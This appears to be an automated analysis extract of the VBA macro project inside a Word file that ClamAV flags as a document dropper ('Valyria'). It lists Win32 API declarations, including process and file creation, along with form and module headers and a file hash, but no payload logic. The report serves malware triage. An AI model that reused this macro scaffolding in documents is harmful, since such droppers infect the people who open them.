Public Declare PtrSafe Function StretchBlt Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function GetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function SetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr, ByVal nStretchMode As LongPtr) As LongPtr
#Else
Public Declare Function SetPixel Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long
Public Declare Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function DeleteDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal crTransparent As Long) As Boolean
Public Declare Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As Long, ByVal dwMilliseconds As Long) As Long

Public Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long


Public Declare Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As Long
Public Declare Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Public Declare Function SelectObject Lib "gdi32" (ByVal hDC As Long, ByVal hObject As Long) As Long
Public Declare Function StretchBlt Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Public Declare Function GetStretchBltMode Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function SetStretchBltMode Lib "gdi32" (ByVal hDC As Long, ByVal nStretchMode As Long) As Long
#End If




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{71D5EFF2-3F92-410F-AC0F-568B57B32146}{D5F739E2-E14E-4970-B4B8-3B50CA408227}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{0D187E7A-FC53-4A33-BBAC-4EFC775E3129}{51908BC7-A5C5-4F4B-82EC-420DF409B5F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 85504 bytes
SHA-256: de47d23e5bd82607c0eaffdf163cd938583d3978f933a27ce35f36fced2b8792
Detection
ClamAV: Doc.Dropper.Valyria-8011744-0
Obfuscation or payload: unlikely